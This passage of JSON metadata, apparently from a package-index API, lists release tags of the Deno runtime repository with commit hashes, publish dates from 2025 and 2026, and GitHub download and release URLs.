5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.